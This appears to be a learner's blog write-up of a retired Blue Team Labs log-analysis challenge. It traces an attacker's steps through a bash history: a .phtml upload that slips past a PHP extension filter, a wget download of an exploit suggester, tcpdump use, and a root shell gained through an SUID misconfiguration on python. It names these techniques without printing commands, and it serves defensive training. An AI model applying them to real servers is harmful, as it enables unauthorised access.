First off, thank you Josh Mason / Cyber Supply Drop & BTLO / Security Blue Team for bringing this challenge and learning opportunity to aspiring cybersecurity practitioners.
Spent quite the enjoyable afternoon checking out this platform after hearing only great things on Reddit/LinkedIn from various industry practitioners.
The platform is exceptionally well-built and I can see why the BTL1 certification is highly regarded.
Key takeaways that I enjoy from the platform —
Minimal handholding even in the Easy rooms.
Clean, well structured UI.
Great leaderboard system that makes me want to work harder.
Great room scenario descriptions!
Once my Blue Team skills get up to scratch, I’m super keen on trying their Investigations.
Decided to do a write up on one of the rooms I completed but WAIT.
Glad I decided to read up on the rules, so I instead attempted a retired challenge and will be doing a write up on —
Log Analysis — Privilege Escalation
A server with sensitive data was accessed by an attacker and the files were posted on an underground forum. This data was only available to a privileged user, in this case the ‘root’ account. Responders say ‘www-data’ would be the logged in user if the server was remotely accessed, and this user doesn’t have access to the data. The developer stated that the server is hosting a PHP-based website and that proper filtering is in place to prevent php file uploads to gain malicious code execution. The bash history is provided to you but the recorded commands don’t appear to be related to the attack.
Can you find what actually happened?
I enjoy the dramatic flair.
Having done some study on Linux privilege escalation recently, I figured this would be a good challenge to put some of that knowledge to practice.
The Bash Log
What user (other than root) is present on the server?
Going through the logs, we can see that the attacker has managed to enter the home directory of the user “daniel”.
What script did the attacker try to download to the server?
Through the wget command, the attacker has tried to download LES — Linux Exploit Suggester.
What packet analyzer tool did the attacker try to use?
The attacker utilized tcpdump, a CLI packet analyzer which is installed by default on most Linux distributions.
What file extension did the attacker use to bypass the upload filter implemented by the developer?
We can see at the very end where the attacker has removed a file from the uploads directory of the server, x.phtml. Whilst most developers will filter .php extensions from being uploaded to a server, there are many alternative extensions that can evade filters.
Based on the commands run by the attacker before removing the php shell, what misconfiguration was exploited in the ‘python’ binary to gain root-level access?
Through leveraging an SUID misconfiguration for Python, the attacker has managed to escalate his privileges to “root” by calling a shell with Python.
What is an SUID misconfiguration?
And by heading to trust GTFOBins, we can see the exact same command run to leverage the SUID misconfiguration.
